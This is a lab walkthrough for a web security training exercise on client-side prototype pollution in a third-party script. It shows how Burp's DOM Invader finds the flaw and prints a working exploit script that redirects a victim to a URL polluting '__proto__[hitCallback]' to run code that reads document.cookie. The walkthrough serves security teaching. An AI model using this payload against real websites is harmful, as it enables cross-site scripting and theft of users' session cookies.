Lab: Client side prototype pollution in third party libraries

After starting the exercise, the store should look like the following image. It is important that you use the Built-In Browser from the Burp Suite in this exercise.

We now activate the DOM Invader in our browser. To do this, we click on the button next to the address bar.

A window opens in which we pull the switch at DOM Invader is off to the right. Then click on the Attack types field.

There we move the switch next to Prototype pollution is off to the right. If you have previously used the DOM Invader, it may already be activated. In this case, the steps above are of course not necessary.

In the browser, we now press the key combination CTRL + SHIFT + I to open the DevTools of the browser. In DevTools, switch to the DOM Invader tab and reload the website.

After reloading the website, the DOM Invader has identified a prototype pollution vector.

You may have to load the website several times before the prototype pollution vector is displayed.

If we click on the Stack Trace, it will be displayed in the Console tab. If we now switch to the Console, we can view the Stack Trace here.

If we click on a link here, we are taken to the JavaScript file ga.js. If you want, you can work through this JavaScript file, but there are no comments here and this file is also very long. We return to our DOM Invader tab and click on the Exploit button.

A new tab opens and we get an XSS-PoC with the alert(1) function.

We now deactivate the DOM Invader, see the description for activating above, and switch to the exploit server by clicking on the Go to exploit server button on the start page of the store.

In the exploit server, we scroll down to the Body section and enter the code for our exploit there. This code should direct a victim to a malicious URL.

<script> location="https://YOUR-LAB-ID.web-security-academy.net/#__proto__[hitCallback]=alert%28document.cookie%29" 
</script>

Remember, you have to replace the code YOUR-LAB-ID.web-security-academy.net with your Lab ID. Now we test the exploit by clicking on the View exploit button.

A new tab opens in the browser and we are shown the executed function alert() again.

We close the tab and switch back to the exploit server. Here we now click the Deliver exploit to victim button and have successfully completed the exercise.

Video Solution

PreviousLab: Client side prototype pollution via flawed sanitizationNextLab: Client side prototype pollution via browser APIs

Last updated